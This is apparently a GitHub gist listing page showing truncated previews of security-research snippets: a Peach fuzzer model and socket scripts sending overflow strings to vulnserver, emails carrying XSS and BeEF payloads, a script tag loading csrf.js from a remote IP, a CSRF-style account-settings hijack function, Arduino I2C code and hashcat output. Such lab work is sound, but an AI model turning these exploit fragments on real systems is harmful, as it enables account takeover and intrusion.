This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd"> | |
<DataModel name="DataHTER"> | |
<String value="HTER " mutable="false" token="true"/> | |
<String value=""/> | |
<String value="\r\n" mutable="false" token="true"/> | |
</DataModel> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
numAs = 10 | |
try: | |
while True: | |
# open a connection to vulnserver | |
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM) | |
s.connect (("localhost", 9999)) | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
# open a connection to vulnserver | |
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM) | |
s.connect (("localhost", 9999)) | |
# receive the banner for vulnserver | |
s.recv (1024) | |
print "[*] Sending 2040 As" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import smtplib | |
email_addr = '[email protected]' | |
email = 'From: %s\n' % email_addr | |
email += 'To: %s\n' % email_addr | |
email += 'Subject: XSS\n' | |
email += 'Content-type: text/html\n\n' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import smtplib | |
email_addr = '[email protected]' | |
email = 'From: %s\n' % email_addr | |
email += 'To: %s\n' % email_addr | |
email += 'Subject: BEEF\n' | |
email += 'Content-type: text/html\n\n' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script src="http://192.168.58.139/csrf.js"></script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function passwordReset(sessionId) | |
{ | |
var url = "/_processaccountoptions?id=" + sessionId; | |
var http = new XMLHttpRequest(); | |
var param1 = "startpage=0"; | |
var param2 = "sendreadreceiptmode=0"; | |
var param3 = "forwardmode=1"; | |
var param4 = "charset=1"; | |
var param5 = "replyto="; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Wire.h> | |
int toggle = 0; | |
void setup() | |
{ | |
Wire.begin(); | |
} | |
void loop() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[0x12 0x68 0xAA 0x10 0x01] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Initializing hashcat v0.49 with 1 threads and 32mb segment-size... | |
Device...........: Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz | |
Instruction set..: x86_32 | |
Number of threads: 1 | |
Hash type: MD4 | |
Speed/sec: 6.77M words | |
Hash type: MD5 |
OlderNewer